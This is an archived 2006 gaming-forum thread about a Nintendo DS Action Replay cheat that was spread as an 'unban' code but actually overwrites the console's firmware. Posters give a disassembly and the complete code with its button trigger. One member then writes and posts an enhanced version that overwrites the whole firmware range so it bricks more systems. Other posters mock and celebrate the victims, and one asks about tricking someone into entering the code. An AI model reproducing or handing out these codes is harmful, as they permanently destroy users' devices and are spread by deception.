Kodewerx
https://www.kodewerx.org/forum/

Success
https://www.kodewerx.org/forum/viewtopic.php?f=2&t=47
Page 1 of 1

Author:  Dualscreenman [ Sun Oct 08, 2006 6:36 am ]
Post subject:  Success

*Link removed on account of GSC borking*
^owned.

Cheaters never prosper.

That's one cheating noob (at least temporarily) out of action.

Author:  Parasyte [ Sun Oct 08, 2006 9:01 am ]
Post subject: 

Mills Lane wrote:
I'll allow it!

Author:  Jeffsback2223 [ Sun Oct 08, 2006 12:07 pm ]
Post subject: 

Poor bastard. Lets hold a moment of silence for the innocent DS...

I know sometimes Game Sharks for N64 do the same.

Author:  Dualscreenman [ Sun Oct 08, 2006 12:54 pm ]
Post subject: 

Just to clue you in, that really is a bricker code.

Author:  Parasyte [ Sun Oct 08, 2006 2:14 pm ]
Post subject: 

No it isn't. It's clearly an unban code.

Author:  king916 [ Wed Oct 11, 2006 6:21 pm ]
Post subject: 

too bad i can't see it anymore cause they shutdown the site.

Author:  dlong [ Wed Oct 11, 2006 7:17 pm ]
Post subject: 

It's understandable though, in the wake of the suicide and everything.

Author:  caitsith2 [ Wed Oct 11, 2006 10:15 pm ]
Post subject: 

This is a disassembly of the so called unban code.

Code:
02780100 EB01D8F0 bl      27F64C8h     ;Erase DS firmware
02780104 E3A0050E mov     r0,3800000h  ;
02780108 EB01D8C1 bl      27F6414h     ;Check completion status
0278010C E3110002 tst     r1,2h        ;
02780110 0AFFFFFB beq     2780104h     ;If complete, then proceed
02780114 E3A00801 mov     r0,10000h    ;
02780118 E3A01803 mov     r1,30000h    ;
0278011C E3A02402 mov     r2,2000000h  ;Overwrite the firmware with
02780120 EB01D7D9 bl      27F608Ch     ;contents of main ram.
02780124 EAFFFFFE b       2780124h     ;Lock up DS (permanently)


The hold L + R portion of the code simply puts in a permanent hook to this code, which is then executed upon connecting, (or at least attempting to), to Nintendo Wifi Connection.

Author:  bosko [ Wed Oct 11, 2006 10:18 pm ]
Post subject: 

Sorry to break up your convo, but I can't get over how "caitsith2" looks soo much like "catshit2" hahaha, I know I know, now you will be offended. but come on... am I right? Huh?!!! Huh?!!?!! yeaaaah you know this!

Author:  Havok [ Thu Oct 12, 2006 6:41 am ]
Post subject: 

bosko wrote:
Sorry to break up your convo, but I can't get over how "caitsith2" looks soo much like "catshit2" hahaha, I know I know, now you will be offended. but come on... am I right? Huh?!!! Huh?!!?!! yeaaaah you know this!


He's right.

EDIT: See one post down.

Author:  Parasyte [ Thu Oct 12, 2006 7:19 am ]
Post subject: 

She's right.

Author:  bosko [ Thu Oct 12, 2006 8:51 am ]
Post subject: 

;)

Author:  Modman [ Thu Oct 12, 2006 11:56 am ]
Post subject: 

That Bricker code is slightly bad ass.

Author:  mutantdreams [ Thu Oct 12, 2006 4:42 pm ]
Post subject: 

so that code will fuck your ds?

Author:  NEo_Bazz [ Mon Oct 16, 2006 2:07 pm ]
Post subject: 

No. In this case, intercourse is not an option.


But it does turn your DS into a brick.

Author:  NEo_Bazz [ Tue Oct 17, 2006 2:34 pm ]
Post subject: 

Extremely sorry for double post; but:

If I were to tell someone they could unban their DS by:

Imputting this code (as stated in previous posts):

02780100 EB01D8F0
02780104 E3A0050E
02780108 EB01D8C1
0278010C E3110002
02780110 0AFFFFFB
02780114 E3A00801
02780118 E3A01803
0278011C E3A02402
02780120 EB01D7D9
02780124 EAFFFFFE

And to hold "L" + "R" while connecting to Nintendo WFC; Would that brick their DS?

Author:  Parasyte [ Tue Oct 17, 2006 2:49 pm ]
Post subject: 

No.

Author:  NEo_Bazz [ Tue Oct 17, 2006 2:50 pm ]
Post subject: 

That what is the Bricker AR code?

Author:  Parasyte [ Tue Oct 17, 2006 2:55 pm ]
Post subject: 

I have a copy saved on my Windows box, which exploded on Thursday night. It should be fixed by tomorrow.

Author:  caitsith2 [ Tue Oct 17, 2006 7:49 pm ]
Post subject: 

Here is the complete bricker code, including the L+R activator. I did not post the complete code previously at that moment.

94000130 FCFF0000 ;If L + R is pressed, replace instructions with
037FB8DC E51FF004 ;ldr r15, =0x2780100
037FB8E0 02780100
D2000000 00000000 ;End If
E2780100 00000028 ;Load DS bricker code (40 bytes) to 0x2780100.
EB01D8F0 E3A0050E ;bl 26F64C8h, mov r0,3800000h
EB01D8C1 E3110002 ;bl 27F6414h, tst r1, 2h
0AFFFFFB E3A00801 ;beq 2780104h, mov r0,10000h
E3A01803 E3A02402 ;mov r1,30000h, mov r2,2000000h
EB01D7D9 EAFFFFFE ;bl 27F608Ch, b 2780124h

Author:  Luigicrowd [ Wed Oct 18, 2006 12:58 pm ]
Post subject: 

XD, cadohacan posted that code at the new GScentral forums saying it was MP:H debug menu.

Author:  lemmayoshi [ Wed Oct 18, 2006 1:41 pm ]
Post subject: 

Don't fucking ruin the fun, asshole.

Author:  dlong [ Wed Oct 18, 2006 4:15 pm ]
Post subject: 

OOPS WE DID IT AGAIN
http://boards.gamefaqs.com/gfaqs/genmes ... c=31204784

3 bricked users and counting!

Author:  caitsith2 [ Wed Oct 18, 2006 4:57 pm ]
Post subject: 

I actually stepped through this code in no$gba.

Here is what actually happens.
Code:
02780100 EB01D8F0 bl      27F64C8h     ;Set the firmware write enable latch
02780104 E3A0050E mov     r0,3800000h  ;
02780108 EB01D8C1 bl      27F6414h     ;Verify the Write enable latch is set.
0278010C E3110002 tst     r1,2h        ;
02780110 0AFFFFFB beq     2780104h     ;If for some reason, the write enable latch is not set, it will lock up forever at this point, without any DS bricking action.
02780114 E3A00801 mov     r0,10000h    ;
02780118 E3A01803 mov     r1,30000h    ;
0278011C E3A02402 mov     r2,2000000h  ;
02780120 EB01D7D9 bl      27F608Ch     ; Overwrite address 0x10000 with 0x100 bytes of data from ram address 0x2000000.
02780124 EAFFFFFE b       2780124h     ;


From disassembling the firmware writing routine, I have determined that in order to completely erase and overwrite the firmware, prior to the branch point, a little bit more work is required.

The assembler code for this is



Code:
mov r4,10000h
bl 27F64C8

Wait_latch_enabled:
mov r0,3800000
bl 27F6414h
tst r1,2h
beq Wait_latch_enabled

mov r0, r4

Firmware_write_loop:
mov r1, 100h
mov r2, 2000000h
bl 27F608Ch
add r4, r4, 100h
cmp r4, 40000h
blt Firmware_write_loop

Endless_loop:
b Endless_loop


In action replay code form, that is

94000130 FCFF0000
037FB8DC E51FF004
037FB8E0 02780100
D2000000 00000000
E2780100 00000038
E3A04801 EB01D8EF
E3A0050E EB01D8C0
E3110002 0AFFFFFB
E1A00004 E3A01C01
E3A02402 EB01D7D8
E2844C01 E3540702
BAFFFFF3 EAFFFFFE

Because the original bricker code only wrote 0x100 bytes to firmware address 0x10000, anybody with a bricker proof DS would notice no effects whatsoever. Not exactly what the original code creator had intended. This one will brick any DS systems that are not bricker proof, and even if the DS is bricker proof, still overwrite the personal settings area of the firmware.

Author:  mutantdreams [ Wed Oct 18, 2006 5:01 pm ]
Post subject: 

EDIT: nvm

Author:  Dualscreenman [ Wed Oct 18, 2006 7:12 pm ]
Post subject: 

lolz, it looks like some dumby used it to prove it only bricked games... GUESS AGAIN, LAMER. ( See page 3 of gameFAGS thread.) *EDIT: it was the noob from Gay Sex who had already bricked his DS.)

Author:  James0x57 [ Wed Oct 18, 2006 11:18 pm ]
Post subject: 

lol
I wonder what Nintendo would do if someone came to them with a bricked DS..
Hey, doesn't the AR DS box have some disclamer about not being able to harm the system?? That could be a problem...

Author:  king916 [ Wed Nov 08, 2006 12:13 am ]
Post subject: 

how do you unbrick it then?

Author:  Dualscreenman [ Wed Nov 08, 2006 5:50 am ]
Post subject: 

You don't.

Well, you could use PPFlash.

Author:  PlutoKiss [ Mon Jun 18, 2007 10:43 pm ]
Post subject:  Re: Success

Wow, this is awesome... I'm sending this to all my friends! *Beep, Beep, Beep... Pling! You've Got Balls!* :lol:

Page 1 of 1 All times are UTC - 8 hours [ DST ]
Powered by phpBB® Forum Software © phpBB Group
https://www.phpbb.com/